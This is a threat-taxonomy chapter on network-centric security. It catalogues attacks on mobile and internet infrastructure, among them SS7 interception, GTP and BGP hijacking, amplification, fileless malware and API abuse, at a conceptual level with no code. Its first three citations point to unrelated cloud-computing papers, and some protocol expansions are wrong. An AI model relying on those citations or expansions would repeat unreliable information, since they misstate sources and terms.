Network-Centric Security Threats
Traditional network environments are characterized by well-defined perimeters and trusted domains. Networks have been initially designed to create internal segments separated from the external world by using a fixed perimeter. The internal network was deemed trustworthy, whereas the external was considered potentially hostile. Perimeter devices, such as firewalls and intrusion detection systems, have been the traditional technologies used to secure the network.
Threats
In this section, we discuss the threats that can be mapped to the network asset taxonomy. The threats reported here are not exhaustive but representative of the matters covered. Most of them are related to mobile network considering the network evolution toward 5G and the fixed-mobile network convergence. This section provides an overview of the main relevant security issues. Most of them are already known and under the attention of different standardization bodies, security working groups, and an alliance that is working on them by providing guidelines and countermeasures as well as configurations hardening. However, despite such actions, some of these attacks are still ongoing. This is in part motivated by the availability of open-source attack tools.
For several years now, vulnerable network assets have been exploited as preferred targets. Malicious cyber actors often target network devices, and, once on the device, they can remain there undetected for long periods. After an incident, where administrators and security professionals perform forensic analysis and recover control, a malicious cyber actor with persistent access on network devices can reattack the recently cleaned hosts. The adoption of a Security Assurance process that covers the entire life cycle management starting from secure design, secure development, secure deployment, security monitoring, and security management is necessary to counteract these attacks. There are also cases where attackers do not need to compromise their intended target directly but can achieve their aim by compromising the supply chain where it is least secure. In the last years, there was, in fact, an increase in breaches caused by vulnerable software. Any given software stack can contain many sources of components and libraries in differing versions, increasing the need to assess, test, and patch carefully. This potential threat highlights the importance of managing the supply chain.
Another source of well-known network breaches is the use of legacy protocols. Signaling exchange is required to establish and maintain a communication channel or session on telecommunication networks as well as allocate resources and manage networks. For example, a 2/3G network uses SS7 (Signalling System 7) and SIGTRAN (SIGnalling Transport) while 4G relies on Diameter; all generations use SIP (Session IP) and GTP (GPRS Tunnel Protocol). Many fundamental services, such as short messaging service (SMS), are managed by these protocols. Many of these signaling protocols are outdated and have been implemented under a trust model that assumed well-behaved mobile operators without the need to deploy strong security controls.
In addition, another type of attack vector comes from a flaw in the specifications. The paper in [1] is just an example of vulnerabilities discovered during a careful analysis of LTE access network protocol specifications and a demonstration of how those vulnerabilities can be exploited using open-source LTE software stack and low-cost hardware. The paper in [2] demonstrates instead the usefulness of adopting a formal verification tool to automatically check whether the desired security properties are satisfied or if instead the defined protocols/procedures suffer from ambiguity or under-specification.
To complete the overview of the attack scenario, another vector comes from the poor configuration of network nodes as highlighted in [3].
In the following section, the most relevant known network threats are reported according to the following categories.[4][5]
- TG2.1: Unintentional damage/loss of information on IT assets: this group includes all threats causing unintentional information leakage or sharing due to human errors.
- TG2.2: Interception and unauthorized acquisition: this group includes any attack, passive or active, where the attacker attempts to listen, intercept, or re-route traffic/data. An example of this would be man-in-the-middle attacks. This group also includes manipulation attacks where the attacker attempts to alter or interfere with data in transit, in particular with signaling messages and routing information.
- TG2.3: Nefarious activity/abuse: this group includes threats coming from nefarious activities. It requires active attacks targeting the network infrastructure of the victim.
- TG2.4: Organisational threats: this group includes threats to the organizational sphere.
Threat Group TG2.1: Unintentional damage/loss of information on IT assets
Threat T2.1.1: Erroneous use or administration of devices and systems
Attacks or human-errors are exploited to gain unauthorized privileged access to a system, which can lead to the installation of other malicious content or backdoors or even physical access to the devices. It is used as part of an attack, regardless of whether the target is a single system/asset or a whole network or facility.
Assets: “Core Network”, “Access Network”, “Infrastructure Network/Area Network”, “Peering Points”.
Threat Group TG2.2: Interception and unauthorized acquisition
Threat T2.2.1: Signaling traffic interception
Most of the signaling protocols are dated and implemented in an insecure way. Most of them have not been designed with security features. SS7 (Signaling System 7) and Diameter are signaling protocols used in mobile networks. It is widely known that these signaling protocols have no security defenses built-in and have several severe security weaknesses, which can be exploited by attackers in many ways. SS7 is used to exchange information among different elements of the same network or between roaming partner networks (e.g., call routing, roaming information, features available to the subscriber). Diameter is the replacement of SS7 in the 4G mobile generation. An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker’s control.
Assets: “Core Network”, “Peering Points”. The exploitation of SS7 design weaknesses to obtain a victim’s location, harvest their messages, and listen in on calls was demonstrated in 2014.[6] Other examples are the demonstration in [7] and [8]. O2 in Germany confirmed that some customers in Germany have had their accounts drained by attackers that used SS7 to intercept and redirect mTANs to their own phones.[9] In [10], and attempted Data interception attacks using SS7 was reported.
Threat T2.2.2: Data session hijacking
Session hijacking is an attack that is basically used to gain unauthorized access between an authorized session connection. For example, the GPRS Tunnelling Protocol (GTP) allows mobile subscribers to maintain a data connection for Internet access while on the move. GTP manages tunnels for transporting IP packets throughout the core network to the internet. GTP comprises three parts—control plane (GTP-C), user plane (GTP-U), and charging (GTP-C). Since there is no authentication and encryption supported in GTP-U messages themselves, several attacks to GTP-U might be possible. An attack via the GRX global roaming exchange network can be conducted by employees of almost any mobile operator as well as by external attackers who have access to the operator’s infrastructure. Such an attacker might be able to craft GTP-U messages and send them to the network to trigger answer messages and thus get information (e.g. about network topology), or just send malicious messages to the network. This may involve guessing a valid TEID (Tunnel Endpoint Identifiers), hijacking a TEID, unless the endpoints use non-predictable TEIDs. Other common hijacking attacks exploited the vulnerabilities of Border Gateway Protocol (BGP). They are documented for instance in IETF’s RFC 4272 “BGP Security Vulnerabilities Analysis”, which was published in 2006. BGP fundamental vulnerabilities related to the lack of a mechanism to protect the integrity and authenticity of messages in peer-to-peer communications. Also, the lack of a mechanism to validate the authority of an AS (Autonomous System) to announce prefixes or relay route information. Finally, BGP has no mechanism to validate the authenticity of the path attributes in prefix announcements. These security vulnerabilities can be exploited by an adversary to perform BGP hijacking when the adversary claims to be the origin of prefixes of another network. The result of this attack is that the traffic is forwarded to the wrong destination. This attack can be used to intercept, alter, or disrupt Internet traffic.
Assets: “Core Network”, “Peering Points”.
Threat T2.2.3: Traffic eavesdropping
An eavesdropping attack is possible if the traffic is not protected, e.g. user-plane traffic is not encrypted at the radio access level or if vulnerable/weak crypto algorithms are used. Eavesdropping is also possible by exploiting a lack of protection on the backhaul link that connects the radio access network to the core network. In 4G network the backhaul is composed of IP-based control elements and interfaces, making it vulnerable to IP-based attacks. In addition, eavesdropping can be possible also by exploiting the lack of mutual authentication between the radio access node and the core network, or the lack of prevention against IP-based attacks, or the lack of encryption of data and signaling traffic. If the backhauling link is not encrypted, then user security context information such as part of the currently used keying material will be revealed to an eavesdropper. Also, the user plane traffic would be available to eavesdroppers in the clear. The impact of eavesdropping depends on what traffic is affected. Eavesdropping control plane traffic can be more critical as it may reveal information to the attacker that allows him to mount further attacks.
Assets: “Radio Access Network”, “Infrastructure Network/Area Network”.
Threat T2.2.4: Traffic redirection
The redirection of data can be accomplished at different levels. On local networks, IPv4 ARP spoofing, ipv6 router advertisement or automatic proxy discovery can be exploited. At the internet level, DNS spoofing is widely used to point legitimate hostnames to fake servers. Ultimately, redirection of data can be possible by data manipulation that can be specially performed if data is not integrity protected.
Assets: “Access Network”, “Core Network”.
Threat Group TG2.3: Nefarious activity/abuse
Threat T2.3.1: The exploitation of software bug
The more the network environment will be softwarized, virtualized, and transferred on general commodity hardware equipment, the more such environment could be exposed to vulnerabilities due to software bugs and poor configuration. Already today every year thousands [11] of software bugs impact network devices such as routers, servers, databases, or other functional elements of the networks. This type of threat also includes network failures when several systems fail to connect or to work together.
Through software bugs, it is possible to attack the vulnerable device or the entire infrastructure causing, for instance, DoS, frauds, and other issues. To help customer to manage such situations, many network manufacturers such as Cisco, Juniper, Ericsson, Huawei set up specific PSIRT (Product Security Incident Response Team) Services, aimed to collect, analyze, and provide patches related to their products and finally to help their customers to address the possible issues suggesting related solutions.
Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”, “Endpoint Network”.
Threat T2.3.2: Manipulation of hardware and firmware
Attacks against hardware and firmware are especially appealing to attackers. Once they have compromised the firmware, they can safely persist on the device and evade the security measures applied at OS, application or software levels. Since the malicious code lives within the firmware of physical components, the threat can easily survive a complete reimaging of the system or even replacement of the hard drive(s). This sort of persistent attack would typically occur as the second stage of malware infection. Once a system is initially compromised, malware could then look for vulnerabilities in the firmware and missing device protections that could allow malicious code to be implanted in the firmware itself. This threat clearly points also to Device/ IoT-centric security.
Assets: “Core Network”, “Infrastructure Network/Area Network”, “Endpoint Network”.
Threat T2.3.3: Malicious code/software/activity
Malware is any piece of software written with the intent of damaging devices, stealing data, or causing damage. Viruses, Trojans, and recently crypto-miners and ransomware are among the different kinds of malware. Although the primary target for malware is traditionally to “infect” a device (fixed or mobile), malware is one of the main threats against network infrastructures (e.g. the control plane), and it will be even more dangerous with the emerging networks softwarization. When devices are considered, this threat is strongly connected to threat T1.4.3 in Device/IoT-centric security.
Assets: “Core Network”, “Endpoint Network”.
Threat T2.3.4: Remote activities (execution)
Remote activities can take a variety of forms, but in general refer to the process by which an agent can exploit a network vulnerability to run, for example, arbitrary code on a targeted machine or system.
Assets: “Core Network”.
Threat T2.3.5: Malicious code – Signaling amplification attacks
Mobile networks do not have enough radio resources to provide service to every single customer at the same time. The scarcity of bandwidth requires advanced techniques to reuse idle resources in an efficient manner. The RRC protocol stack reassigns radio resources from a given user when the connection goes idle for a few seconds. When an inactivity timer expires, the radio bearer between the mobile device and the core network is closed and those resources become available to be reassigned to another UE. At this stage, the UE moves from connected to the idle state. Each instance of bearer disconnection and setup involves a significant number of control messages exchanged among nodes within the EPC (Evolved Packet Core). DNS amplification is another example of an attack that massively exploit open recursive DNS servers mainly for performing bandwidth consumption (DDoS attacks). The amplification effect lies in the fact that DNS response messages may be substantially larger than DNS query messages.
Assets: “Access Network”, “Radio Access Network“, “Core Network”.
Threat Group TG2.4: Organization (failure malfunction)
Threat T2.4.1: Failures of devices or systems
System failures include the incidents caused by failures of a system, for example, hardware failures, software failures or errors in procedures or policies. An example is a software bug in a system like an HLR that suddenly stops its operation and consequently prevents al subscribers from connecting. This threat clearly points also to Device/IoT.
Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”.
Threat T2.4.2: Supply chain
A supply chain threat refers to the compromise of an asset, for instance, a software provider’s infrastructure and commercial software, with the aim to indirectly damage a certain target (e.g., the software provider’s clients). This type of attack is typically used as a first step out of a series of attacks. More concisely, it is used as a stepping stone for further exploitation, once a foothold is gained to the target system or systems. Attackers do not need to compromise their intended target directly but, in many cases, can achieve their aim by compromising the supply chain where it is least secure. This potential threat highlights the importance of managing the supply chain holistically and driving out or mitigating insecure elements.
Assets: “Infrastructure Network”.
Threat T2.4.3: Software bug
A security bug is a software bug that can be exploited to gain unauthorized access or privileges on a computer system. Software bugs could have an impact on ICT systems, such as routers, servers, databases, and in this way impact networks or services. This type of threat also includes complex failures like network failures when several systems fail to connect or otherwise work together.
Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”.
Emerging Threats in COVID-19 Era
The advent of COVID-19 generated the following new Network-centric threats:
Threat 2.3.6: Exploitation of vulnerabilities in services and remote tools -COVID-19
With the increase of remote workers during the COVID19 period, many users no longer relied on the infrastructure monitored by the company to access sensitive information on the network. Malicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Similarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto have been exploited. The surge in teleworking has also led to an increase in the use of Microsoft’s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online, and recent analysis has identified a 127% increase in exposed RDP endpoints [12].
Threat 2.5.1: Physical attack – COVID-19
Conspiracy theories around 5G and health have been circulating in Europe for the past 18 months or so but has recently morphed into claims that Covid-19 is being caused by 5G [13]. Base station attacks have increased due to disinformation around 5G. There have been several attacks on base stations around the world, including cables being hacked out of the masts through to petrol being poured in and around the equipment and then being set alight. The UK has been appeared to be a focus for these attacks with occurrences across the country. Other examples include New Zealand, The Netherlands and Ireland. The attacks to base station have impacted the resilience, availability and business continuity of services of the mobile networks.
Emerging Threats in 2021
The following is the list of Network-centric security threats that emerged in 2021.
Threat T2.1.2: Security misconfigurations in systems/networks
Security misconfiguration can happen at any levels including poorly configured APIs, network functions, access control rules, network slices, administration rights, virtualised environments, traffic isolation, edge nodes, orchestration software, firewalls. The exploitation of a misconfigured system creates the opportunity for a threat actor to reach critical assets in the network.
Threat 2.3.7: Exploitation of System Administrative Tools and Fileless malware
Fileless malware are designed to bypass familiar detection controls and infiltrate key systems by ‘living off the land’, using approved platforms or software tools that already exist within corporate networks. This approach allows attackers to get around common detection methods that scan for malicious file attachments. In addition, the use of existing system tools means malicious actors do not have to design their own attack framework. This decreases the time required for malware development. It is expected that attackers will use fileless malware to compromise service network providers rather than specific groups and then to use their existing infrastructure to attack downstream clients. A study conducted by Positive technologies shows that more than 50% of threat groups leverage publicly available penetration testing and system administration tools to develop attack strategies. Exploitation of system administration and penetration tools, like Cobalt Strike, PowerShell Empire and BloodHound, is in fact increasing. Cybercriminals are using these and other legitimate admin tools to carry out and hide their activities, a tactic known as living off the land. By making use of legitimate admin tools that are already installed on target computers and running scripts and shellcode directly in memory, attackers can greatly reduce the chances of being detected, as the attack creates fewer new files that antivirus and other detection tools can spot. The result is that these attacks generally go undetected.
Threat T2.3.8: Exploitation of application programming interfaces (APIs)
The adoption of Application Programming Interfaces (APIs) is increased in the last years with their use in 5G networks. The shift to service-based interfaces within the 5G core and the increased use of API based communication exposed to external networks, introduce a new attack surface. A poorly designed or configured API with inaccurate access control rules may expose core network functions and sensitive parameters. The exploitation can target different types of API related to internal network functions, internetworking interfaces, roaming interfaces, and the like, exposed in different layers of the network.
[1] M. Armbrust, A. Fox, R. Griffith, A. Joseph, R. Katz, A. Konwinski, G. Lee, D. Patterson, A. Rabkin, I. Stoica e M. Zaharia, «Above the Clouds: A Berkeley View of Cloud Computing,» University of California at Berkeley UCB/EECS-2009-28, February, vol. 28, February 2009.
[2] P. Mell e T. Grance, «The NIST definition of cloud computting,» 2019.
[3] S. Chandna, R. Singh e F. Akhtar, «Data Scavenging Threat in Cloud Computing,» International Journal of Advances In Computer Science and Cloud Computing, 2014.
[4] Mobile Telecommunications Security Threat Landscape, GSMA, January 2019https://www.gsma.com/aboutus/resources/mobile-telecommunications-security-threat-landscape
[5] Threat Landscape 2018, ENISAhttps://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends/enisa-threat-landscape
[6] White hats do an NSA, figure out LIVE PHONE TRACKING via protocol vuln https://www.theregister.co.uk/2014/12/26/ss7_attacks/
[7] Tobias Engel, “SS7: Locate. Track. Manipulate”, 2014, https://imsicatcher.info/article/ss7-locate-track-manipulate/
[8] “SS7 Attack Discovery” , Positive Technologies, 2016 https://www.ptsecurity.com/upload/corporate/ww-en/products/documents/ss7/PT-TAD-Product-Brief-eng.pdf
[9] Schwachstelle im Mobilfunknetz: Kriminelle Hacker räumen Konten leer https://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504
[10] Tunnel Vision : Malicious data interception via SS7 https://www.adaptivemobile.com/blog/malicious-data-interception-via-ss7
[11] Seehttps://www.cvedetails.com/vulnerabilities-by-types.php
[12] COVID-19 Exploited by Malicious Cyber Actors, https://us-cert.cisa.gov/ncas/alerts/aa20-099a
[13] The people who think coronavirus is caused by 5G, https://www.bbc.com/news/av/stories-53285610
Università degli Studi di Milano
Via Celoria 18, 20133 Milano MI - Italy
+39 02 503 16333 - sesarlab@unimi.it